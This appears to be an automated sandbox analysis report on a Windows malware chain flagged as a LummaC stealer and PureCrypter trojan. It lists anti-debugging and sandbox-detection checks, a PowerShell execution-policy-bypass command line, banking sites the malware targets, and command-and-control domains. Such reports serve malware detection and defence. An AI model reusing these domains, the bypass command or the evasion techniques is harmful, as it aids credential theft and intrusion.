Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: powershell.exe, 00000019.00000002.2934398498.0000000008374000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 19 { "VMware ESXi" }
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\]q
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASSOCIATORS OF {\\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""} WHERE AssocClass = MSFT_DiskToPartition ResultClass = MSFT_Disk ResultRole = Disk Role = Partitionion has failed the
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2933297668.000000000830F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Partition.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"
Source: file.exe, 00000000.00000002.2411288115.0000000000764000.00000040.00000001.01000000.00000003.sdmp, DocumentsECAFHIIJJE.exe, 00000014.00000002.2465829804.0000000000916000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000015.00000002.2488317379.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3291976640.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, file1.exe, 00000018.00000002.2876972921.00000000009CE000.00000040.00000001.01000000.0000000F.sdmp, 4136f86ac7.exe, 0000001E.00000002.3116078239.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp, 4136f86ac7.exe, 0000001E.00000002.3129252471.0000000006044000.00000040.00000800.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2927433701.0000000000424000.00000040.00000001.01000000.00000013.sdmp, 0ac2a0f3ae.exe, 00000024.00000002.3120888781.0000000000B9D000.00000040.00000001.01000000.00000019.sdmp, 4136f86ac7.exe, 00000025.00000002.3258230937.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 4136f86ac7.exe, 00000025.00000002.3262095718.000000000149B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 19 { $_type += "VMware ESXi" }

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsECAFHIIJJE.exe

Code function: 20_2_04C00C4B rdtsc

20_2_04C00C4B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C685FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C685FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68C410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C68C410

Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_0075652B mov eax, dword ptr fs:[00000030h]	20_2_0075652B
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Code function: 20_2_0075A302 mov eax, dword ptr fs:[00000030h]	20_2_0075A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0101A302 mov eax, dword ptr fs:[00000030h]	21_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0101652B mov eax, dword ptr fs:[00000030h]	21_2_0101652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0101A302 mov eax, dword ptr fs:[00000030h]	23_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0101652B mov eax, dword ptr fs:[00000030h]	23_2_0101652B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C65B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C65B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C80AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_8996.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: file.exe PID: 3724, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 8836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 3160604f40.exe PID: 5264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4136f86ac7.exe PID: 9108, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY3.ps1, type: DROPPED

Bypasses PowerShell execution policy

Source: C:\Windows\System32\mshta.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "

Detected PureCrypter Trojan

Source: file1.exe, 00000018.00000003.2768557455.0000000005A85000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1085156-1-3,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1008556-23-102,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-63,eej45377:646690,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,domexpansion_v1:408272,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,i8id9958:449025,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1039913-1-22,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-484,P-D-1138318-1-3,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"130.0.0.0"}]},"EdgeShoppingDomMutationExpansion":{"enableFeatures":["msShoppingExp67"]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]},"EdgeVpnAllSites":{"enableFeatures":["msEnableVpnAllSites"]},"EnhancedTextContrast":{"enableFeatures":["msEnhancedTextContrast"]},"ExternalStoreZeroSearc

LummaC encrypted strings found

Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: faintbl0w.sbs
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: 300snails.sbs
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: 3xc1aimbl0w.sbs
Source: file1.exe, 00000018.00000003.2730971554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thicktoys.sbs
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: scriptyprefej.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: navygenerayk.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: founpiuer.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: necklacedmny.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: thumbystriw.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: fadehairucw.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: crisiwarny.store
Source: 4136f86ac7.exe, 0000001E.00000002.3115438183.0000000000C11000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: presticitpo.store

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C854760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C854760

Source: file.exe, file.exe, 00000000.00000002.2411288115.0000000000764000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: ^b\|Program Manager
Source: powershell.exe, 00000022.00000002.3292099813.000000E6B82CA000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager Chrome

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C65B341 cpuid

0_2_6C65B341

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005637001\l.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005637001\l.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
